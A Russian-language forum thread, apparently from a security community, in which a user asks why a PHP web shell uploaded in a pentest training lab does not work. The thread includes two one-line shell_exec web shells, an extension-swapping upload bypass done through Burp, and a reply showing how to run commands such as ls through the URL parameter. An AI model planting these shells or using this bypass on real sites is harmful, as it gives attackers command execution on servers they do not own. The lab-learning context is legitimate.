Помощь в загрузке шелла в CRM Pentest lab 11.

  • Автор темы Автор темы Sykes
  • Дата начала Дата начала
  • Теги Теги
    shell

Sykes

Green Team
17.10.2017
143
93
Не выходит загрузить шелл на сайт, всё делается по канонам и гайдам.
Burp Community, обновлен из реп, прокси через FoxyProxy, шелл вида <? echo shell_exec($_GET['cmd']) ?> или <? echo shell_exec($_GET['e'].' 2>&1'); ?>. Грузил шелл в jpg, jpeg, gif, барпом ловил запрос и менял расширение шелла на php - толку нет. Когда шел по пути /test/logo/shell.php, то белый экран, при других шеллах ошибка 404. Будьте добры помочь
 
Когда шел по пути /test/logo/shell.php, то белый экран,
А что Вы хотите увидеть?
Для первого шелла нужно указать параметр cmd, для второго - e
Код:
site/test/logo/shell.php?cmd=%команда%
или
Код:
site/test/logo/shell.php?e=%команда%
Например,
Код:
site/test/logo/shell.php?cmd=ls
 
  • Нравится
Реакции: yarr и Vertigo
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

🚀 Первый раз на Codeby?
Гайд для новичков: что делать в первые 15 минут, ключевые разделы, правила
Начать здесь →

Популярный контент

🔴 Свежие CVE, 0-day и инциденты
То, о чём ChatGPT ещё не знает — обсуждаем в реальном времени
Threat Intel →
💼 Вакансии и заказы в ИБ
Pentest, SOC, DevSecOps, bug bounty — работа и проекты от проверенных компаний
Карьера в ИБ →

HackerLab